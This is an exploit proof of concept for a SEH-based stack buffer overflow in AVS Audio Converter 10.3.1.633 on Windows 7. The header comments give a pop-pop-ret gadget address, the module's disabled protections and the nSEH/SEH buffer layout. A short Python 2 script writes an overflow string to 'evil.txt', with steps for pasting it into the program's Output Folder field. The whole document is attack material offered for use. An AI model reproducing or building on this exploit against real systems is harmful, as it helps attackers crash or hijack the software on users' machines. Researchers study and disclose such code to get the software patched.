# Exploit Title: AVS Audio Converter 10.3 - Stack Overflow (SEH)
# Discovered by: Yehia Elghaly - Mrvar0x
# Discovered Date: 2022-10-16
# Tested Version: 10.3.1.633
# Tested on OS: Windows 7 Professional x86
#pop+ret Address=005154E6
#Message= 0x005154e6 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [AVSAudioConverter.exe]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v10.3.1.633 (C:\Program Files\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe)
# The only module that has SafeSEH disabled.
# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll |
# 0x00400000 | 0x01003000 | False | False | False | False | False |
#Allocating 4-bytes for nSEH which should be placed directly before SEH which also takes up 4-bytes.
#Buffer = '\x41'* 260
#nSEH = '\x42'*4
#SEH = '\x43'*4
#ESI = 'D*44' # ESI Overwrite
#buffer = "A"*260 + [nSEH] + [SEH] + "D"*44
#buffer = "A"*260 + "B"*4 + "\xE6\x54\x51\x05" + "D"*44
# Rexploit:
# Generate the 'evil.txt' payload using python 2.7.x on Linux.
# Open the file 'evil.txt' Copy.
# Paste at'Output Folder and click 'Browse'.
#!/usr/bin/python -w
filename="evil.txt"
buffer = "A"*260 + "B"*4 + "C"*4 + "D"*44
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()